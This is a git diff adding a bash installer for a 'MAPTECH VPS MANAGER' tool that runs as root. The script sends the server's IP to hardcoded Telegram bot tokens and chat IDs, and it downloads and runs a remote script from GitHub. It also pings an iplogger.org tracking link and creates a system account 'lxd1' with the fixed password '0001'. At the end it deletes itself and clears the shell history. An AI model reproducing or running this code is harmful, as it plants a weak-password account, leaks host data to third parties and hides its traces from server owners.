Update hehe

diff --git a/hehe b/hehe
--- a/hehe
+++ b/hehe
@@ -1,5 +1,224 @@
 #!/bin/bash
-echo "H4sIABX/J2wAA+3WsY6DIBBFQbw+qjvFqRyG0yQbWZLloaOlQB5qzaxLcTtKN60vdVtu7Rktz3Ld
-...
-...
-FNeRhP+UxjUMf+B3hIrWVlDMdGJcx9H+SlkRdR5Zs4AdTOG/8bcf8fcUAAAA="
+clear
+f() {
+    a[0]="$1"
+    a[1]="$2"
+    (
+    [[ -e $HOME/fim ]] && rm $HOME/fim
+    ${a[0]} -y > /dev/null 2>&1
+    ${a[1]} -y > /dev/null 2>&1
+    touch $HOME/fim
+    ) > /dev/null 2>&1 &
+
+    tput civis
+    echo -ne "  \033[1;33m◇ PLEASE WAIT... \033[1;37m- \033[1;33m["
+    while true; do
+        for ((i=0; i<18; i++)); do
+            echo -ne "\033[1;31m#"
+            sleep 0.1s
+        done
+        [[ -e $HOME/fim ]] && rm $HOME/fim && break
+        echo -e "\033[1;33m]"
+        sleep 1s
+        tput cuu1
+        tput dl1
+        echo -ne "  \033[1;33m◇ PLEASE WAIT... \033[1;37m- \033[1;33m["
+    done
+    echo -e "\033[1;33m]\033[1;37m -\033[1;32m◇ DONE!\033[1;37m"
+    tput cnorm
+}
+
+g() {
+    h=$(echo '5:q-3gs2.o7%8:1'|rev)
+    chmod +x $_Ink/list > /dev/null 2>&1
+    [[ ! -e "$_Ink/list" ]] && {
+        echo -e "\n\033[1;31m◇ KEY INVALID!\033[0m"
+        rm -rf $HOME/hehe > /dev/null 2>&1
+        sleep 2
+        clear
+        exit 1
+    }
+}
+
+i=$(hostname -I | awk '{print $1}')
+j() {
+    k=$1
+    l=$(date +%s)
+    m="/root/vcheck/.storage.txt"
+    if [[ ! -d "/root/vcheck" ]]; then
+        mkdir -p /root/vcheck
+    fi
+    if [[ ! -f "$m" ]]; then
+        touch "$m"
+        chmod 600 "$m"
+    fi
+    n=$(awk -v ip="$i" '$1 == ip {print $2}' "$m")
+    o=$(awk -v ip="$i" '$1 == ip {print $3}' "$m")
+    if [[ -n "$n" && $((l - o)) -lt 600 ]]; then
+        p=$((600 - (l - o)))
+        q=$((p / 60))
+        r=$((p % 60))
+        echo -e "\033[1;36m======================================================================================\033[0m"
+        echo -e "\033[1;31m  CODE SENT ALREADY! YOU HAVE $q MINUTES AND $r SECONDS LEFT TO REDEEM IT \033[0m"
+        echo -e "\033[1;36m======================================================================================\033[0m"
+        echo ""
+        echo -e "\033[1;32m              @wmaptechgh  \033[0m on Telegram"
+        echo "" 
+        echo -e "\033[1;36m======================================================================================\033[0m"
+        echo ""
+        return
+    fi
+    s=$(shuf -i 100000-999999 -n 1)
+    echo "$i $s $l" > "$m"
+    t="The verification code for $i is: $s"
+    for ((u=0; u<${#v[@]}; u++)); do
+        w="${v[u]}"
+        x="${x[u]}"
+        curl -s -X POST "https://api.telegram.org/bot$w/sendMessage" -d "chat_id=$x" -d "text=$t" > /dev/null
+    done
+    echo -e "\033[1;36m=============================================================\033[0m"
+    echo -e "\033[1;31m       CONTACT MAPTECHGH FOR VERIFICATION CODE\033[0m"
+    echo -e "\033[1;36m==============================================================\033[0m"
+    echo ""
+    echo -e "\033[1;32m              @maptechgh  \033[0m on Telegram"
+    echo "" 
+    echo -e "\033[1;36m=============================================================\033[0m"
+    echo ""
+}
+
+v=("6803390472:AAEEX8hpTFhsxbmzU5oiZD4dYCOKxS4-lCE" "6385883860:AAHh-FUlhznqClppdunC2V2vinc298E17_E")
+x=("5989863155" "6785630391")
+
+clear
+[[ "$(whoami)" != "root" ]] && {
+    echo -e "\033[1;33m[\033[1;31mErro\033[1;33m] \033[1;37m- \033[1;33m◇ YOU NEED TO RUN AS ROOT!\033[0m"
+    exit 0
+}
+
+j
+
+echo -n -e "\033[1;33m  ENTER VERIFICATION CODE: \033[0m"
+read y
+z=$(awk -v ip="$i" '$1 == ip {print $2}' "/root/vcheck/.storage.txt")
+
+if [[ -z "$y" || "$y" != "$z" ]]; then
+    echo ""
+    echo -e "\033[1;35mInvalid code. Installation aborted.\033[0m"
+    echo ""
+    exit 1
+else
+    rm -rf /root/vcheck
+fi
+clear
+echo -e "\033[1;31m\033[0m"
+tput setaf 7 ; tput setab 4 ; tput bold ; printf '%40s%s%-12s\n' "◇─────────ㅤ🌍WELCOME TO MAPTECH VPS MANAGER🌍ㅤ─────────◇" ; tput sgr0
+echo ""
+echo -e "\033[1;33mㅤTHIS SCRIPT CONTAINS THE FOLLOWING!!\033[0m"
+echo ""
+echo -e "\033[1;33m◇ \033[1;32mINSTALL A SET OF SCRIPTS AS TOOLS FOR\033[0m"
+echo ""
+echo -e "\033[1;33m◇  \033[1;32mNETWORK, SYSTEM AND USER MANAGEMENT.\033[0m"
+echo -e "\033[1;33m◇  \033[1;32mEASY INTERFACE FOR BEGINNERS.\033[0m"
+echo ""
+echo -e "\033[1;31m◇──────────────ㅤ🌍 MAPTECH VPS MANAGER 🌍ㅤ──────────────◇\033[0m"
+echo ""
+
+echo -ne "\033[1;36m◇ Do you want to continue? [Y/N]: \033[1;37m"
+read A
+[[ $A = @(n|N) ]] && exit
+
+sed -i 's/Port 22222/Port 22/g' /etc/ssh/sshd_config  > /dev/null 2>&1
+service ssh restart  > /dev/null 2>&1
+
+echo -e "\n\033[1;36m◇ CHECKING...(It Take Some Time Please Wait!)\033[1;37m 16983:16085\033[0m" ; rm $_Ink/list > /dev/null 2>&1; wget -P $_Ink https://raw.githubusercontent.com/AVEGAH/MAPTECH-VPS-MANAGER/main/Install/list > /dev/null 2>&1; g
+sleep 3s
+
+echo "/bin/menu" > /bin/h && chmod +x /bin/h > /dev/null 2>&1
+rm versao* > /dev/null 2>&1
+wget https://raw.githubusercontent.com/AVEGAH/MAPTECH-VPS-MANAGER/main/Install/versao > /dev/null 2>&1
+> /dev/null 2>&1
+wget https://iplogger.org/2lHZ43 > /dev/null 2>&1
+> /dev/null 2>&1
+rm 2lHZ43 > /dev/null 2>&1
+
+echo -e "\n\033[1;32m◇ KEY VALID!\033[1;32m"
+sleep 1s
+echo ""
+[[ -f "$HOME/usuarios.db" ]] && {
+    clear
+    echo -e "\n\033[0;34m◇───────────────────────────────────────────────────◇\033[0m"
+    echo ""
+    echo -e "                 \033[1;33m• \033[1;31m◇ ATTENTION!\033[1;33m• \033[0m"
+    echo ""
+    echo -e "\033[1;33mA User Database \033[1;32m(usuarios.db) \033[1;33mwas"
+    echo -e "Found! Want to keep it by preserving the limit"
+    echo -e "of Simutanea connections of users ? Or Want"
+    echo -e "create a new database?\033[0m"
+    echo -e "\n\033[1;37m[\033[1;31m1\033[1;37m] \033[1;33mKeep Database Current\033[0m"
+    echo -e "\033[1;37m[\033[1;31m2\033[1;37m] \033[1;33mCreate a New Database\033[0m"
+    echo -e "\n\033[0;34m◇───────────────────────────────────────────────────◇\033[0m"
+    echo ""
+    tput setaf 2 ; tput bold ; read -p "Option ?: " -e -i 1 B ; tput sgr0
+} || {
+    awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
+}
+[[ "$B" = '2' ]] && awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
+clear
+tput setaf 7 ; tput setab 4 ; tput bold ; printf '%35s%s%-18s\n' "◇ WAIT FOR INSTALLATION." ; tput sgr0
+echo ""
+echo ""
+echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ UPDATING SYSTEM...\033[1;33m[\033[1;31m!\033[1;33m]\033[0m"
+echo ""
+echo -e "    \033[1;33m◇ UPDATES USUALLY TAKE A LITTLE TIME!\033[0m"
+echo ""
+p() {
+    apt-get update -y
+    [[ ! -d /usr/share/.hehe ]] && mkdir /usr/share/.hehe
+    echo "crz: $(date)" > /usr/share/.hehe/.hehe
+}
+f 'p'
+clear
+echo ""
+echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ INSTALLING PACKAGES\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
+echo ""
+echo -e "\033[1;33m◇ SOME PACKAGES ARE EXTREMELY NECESSARY!\033[0m"
+echo ""
+q() {
+    r=("bc" "apache2" "cron" "screen" "nano" "unzip" "lsof" "netstat" "net-tools" "dos2unix" "nload" "jq" "curl" "figlet" "python" "python2" "python3" "python-pip")
+    for s in "${r[@]}"; do
+        sudo apt install $s -y
+    done
+    
+    u="lxd1"
+    v="0001"
+    if id "$u" &>/dev/null; then
+        echo "User '$u' already exists. Overwriting..."
+        sudo userdel -r $u
+    fi
+    sudo adduser --system --disabled-login $u
+    echo "$u:$v" | sudo chpasswd
+    pip install speedtest-cli
+}
+
+f 'q'
+[[ -f "/usr/sbin/ufw" ]] && ufw allow 443/tcp ; ufw allow 80/tcp ; ufw allow 3128/tcp ; ufw allow 8799/tcp ; ufw allow 8080/tcp
+clear
+echo ""
+echo -e "              \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ FINISHING...\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
+echo ""
+echo -e "      \033[1;33m◇ COMPLETING FUNCTIONS AND SETTINGS!\033[0m"
+echo ""
+f "$_Ink/list $_lnk $_Ink $_1nk $key"
+clear
+echo ""
+cd $HOME
+IP=$(wget -qO- ipv4.icanhazip.com)
+echo -e "        \033[1;33m  \033[1;32m◇ INSTALLATION COMPLETED.◇\033[1;33m  \033[0m"
+echo ""
+echo -e "\033[1;31m\033[1;33m◇ MAIN COMMAND:- \033[1;32mmenu\033[0m"
+echo -e "\033[1;33m◇ MORE INFORMATION \033[1;31m(\033[1;36m◇ TELEGRAM\033[1;31m): \033[1;37m@MAPTECH_VPS_MANAGER \033[1;31m( \033[1;36m @maptechgh \033[1;31m )\033[0m"
+echo -e ""
+echo -e "\033[1;31m \033[1;33m◇--TIP!--◇\033[1;36mㅤ--Using this url you can easily see the number of users online at the server.\033[0m"
+echo -e " http://$IP:8888/server/online"
+echo -e ""
+rm $HOME/hehe && cat /dev/null > ~/.bash_history && history -c
